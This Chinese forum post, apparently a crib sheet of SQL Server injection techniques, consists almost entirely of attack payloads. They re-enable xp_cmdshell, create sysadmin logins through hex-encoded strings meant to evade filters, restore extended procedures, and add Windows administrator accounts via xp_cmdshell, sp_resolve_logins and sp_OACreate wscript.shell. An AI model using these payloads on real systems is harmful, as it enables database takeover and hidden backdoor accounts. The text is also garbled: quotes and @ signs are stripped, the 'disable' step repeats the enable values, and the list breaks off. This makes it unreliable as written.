SQL高级注入使用之存储过程 以下这都是我们老师给我的学习资料呵呵！其实我也有的看不懂，给朋友们中的一些高手看看！我还是菜鸟呢-_-！。sql2005恢复xp_cmdshellEXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell, 1;RECONFIGURE;关闭:EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell, 1;RECONFIGURE;零、- 添加SA用户-&1、exec master.dbo.sp_addlogin system;2、exec master.dbo.sp_addlogin system,system;3、exec master.dbo.sp_addsrvrolemember itpro,sysadmin&防注入 sa:itpro pass:itprodeclare s varchar(4000) set s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e20697470726f as varchar(4000);exec(s); declare c varchar(4000) set c=cast(0x65786563206d61737465722e64626f2e73705f70617373776f7264206e756c6c2c697470726f2c697470726f as varchar(4000);exec(c); declare a varchar(4000) set a=cast(0x65786563206d61737465722e64626f2e73705f616464737276726f6c656d656d6265722027697470726f272c2073797361646d696e as varchar(4000);exec(a);- and 1=1防注入 sa:system pass:systemdeclare s varchar(4000) set s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e2073797374656d2c73797374656d as varchar(4000);exec(s);declare a varchar(4000) set a=cast(0x65786563206d61737465722e64626f2e73705f616464737276726f6c656d656d626572202773797374656d272c2073797361646d696e as varchar(4000);exec(a);- and 1=1一、-恢复存储过程-&use masterexec sp_addextendedproc xp_cmdshell,xp_cmdshell.dllexec sp_dropextendedproc xp_cmdshellexec sp_addextendedproc xp_cmdshell, xpsql70.dllexec sp_dropextendedproc xp_cmdshellexec sp_addextendedproc xp_cmdshell,xpweb70.dllexec sp_addextendedproc xp_dirtree,xpstar.dllexec sp_addextendedproc xp_enumgroups,xplog70.dllexec sp_addextendedproc xp_fixeddrives,xpstar.dllexec sp_addextendedproc xp_loginconfig,xplog70.dllexec sp_addextendedproc xp_enumerrorlogs,xpstar.dllexec sp_addextendedproc xp_getfiledetails,xpstar.dllexec sp_addextendedproc sp_OACreate,odsole70.dllexec sp_addextendedproc sp_OADestroy,odsole70.dllexec sp_addextendedproc sp_OAGetErrorInfo,odsole70.dllexec sp_addextendedproc sp_OAGetProperty,odsole70.dllexec sp_addextendedproc sp_OAMethod,odsole70.dllexec sp_addextendedproc sp_OASetProperty,odsole70.dllexec sp_addextendedproc sp_OAStop,odsole70.dllexec sp_addextendedproc xp_regaddmultistring,xpstar.dllexec sp_addextendedproc xp_regdeletekey,xpstar.dllexec sp_addextendedproc xp_regdeletevalue,xpstar.dllexec sp_addextendedproc xp_regenumvalues,xpstar.dllexec sp_addextendedproc xp_regread,xpstar.dllexec sp_addextendedproc xp_regremovemultistring,xpstar.dllexec sp_addextendedproc xp_regwrite,xpstar.dllexec sp_addextendedproc xp_availablemedia,xpstar.dll&恢复cmdshell防注入=declare a varchar(255),b varchar(255),c varchar(255);set a=0x6D61737465722E2E73705F616464657874656E64656470726F63;set b=0x78705F636D647368656C6C;set c=0x78706C6F6737302E646C6C;exec a b,c=二、-恢复sp_addextendedproc存储过程-&create procedure sp_addextendedproc - 1996/08/30 20:13functname nvarchar(517),/* (owner.)name of function to call */ dllname varchar(255)/* name of DLL containing function */ asset implicit_transactions offif trancount 0beginraiserror(15002,-1,-1,sp_addextendedproc)return (1)enddbcc addextendedproc( functname, dllname)return (0) - sp_addextendedprocGO&三、-使用存储过程加管理方法-&1、master.dbo.xp_cmdshell net user itpro gmasfm & net localgroup administrators itpro /add2、EXEC sp_resolve_logins text, e:asp&net user admina admin /add&net localgroup administrators admina /add&dir e:asp, 1.asp3、DECLARE shell INT EXEC SP_OAcreate wscript.shell,shell OUTPUT EXEC SP_OAMETHOD shell,run,null, C:WINdowssystem32cmd.exe /c net user sadfish fish /add&四、- 导出文件的存储过程 -&DECLARE shell INT EXEC SP_OAcreate wscript.shell,shell OUTPUT EXEC SP_OAMETHOD shell,run,null, C:WINdowssystem32cmd.exe /c netstat -an c:1.txt&五、-